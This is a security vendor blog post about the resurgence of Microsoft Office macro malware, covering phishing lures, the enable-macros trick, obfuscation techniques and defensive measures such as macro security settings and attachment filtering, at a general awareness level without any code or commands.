This blog post was written by Vincent Weafer.
“Warning: This document contains macros.” A familiar message from the 1990’s is back, as attackers find new ways to get people to open documents containing macro malware. This updated threat is targeted at users in large organizations that frequently use macros. Carefully crafted and socially engineered emails entice users to open seemingly legitimate documents and then enable the macro. According to the latest McAfee Labs Threats Report, incidents of malicious macros have increased by a factor of four in the last year.
The most popular macro malware targets are Microsoft Office documents, especially Word files. Word allows macros to run automatically, for example when a user opens a document, closes it, or creates a new one. These commands are commonly used by both legitimate and malicious macros.
The path to a broad-based system infection through macro malware typically starts with an email attachment made to appear like something legitimate, often socially engineered to fit the targeted user. Common subject lines include phrases such as payment request, courier notification, resume, sales invoice, and donation confirmation. The text of the email matches the subject line with enough information to get the attachment opened, including official-looking signatures and logos.
Once opened, the security features in Microsoft Office will warn users that the file contains macros, and ask if they want to enable them. Some of these files have large text proclaiming that they are protected and that macros must be enabled to view them. If the user clicks “Enable,” the malicious code executes, dropping a malware downloader onto the system that will bring in the real malware payload, and then often deleting itself afterward. The malicious code can also be embedded in the document as an Active Object, which also generates warnings when clicked, but many users may not be familiar with the threat potential of these files.
One of the biggest changes to macro malware since the last big infestation is its current ability to hide, making it much more difficult to detect. Macro malware authors have adopted several techniques from other types of malware, including adding junk code and writing complex encrypted strings. Junk code is just that, code that is never intended to execute, but can be easily generated and frequently changed to defeat signature-detection algorithms and confuse threat researchers. More complicated is the use of multiple simple functions, such as character conversion, to hide the malicious URL from email gateways and malware keyword scanners.
The simplicity and ease of coding macros makes them accessible to a wide range of criminals with minimal tech skills. As a result, the potential reach and effectiveness of macro malware means that businesses should re-educate users about this threat. Furthermore, the operating system and applications should be kept up to date and macro security settings on all Microsoft Office products should be set to high. Email applications should not automatically open attachments. Email gateways and virus scanners should also be configured to scan for and filter email attachments containing macros.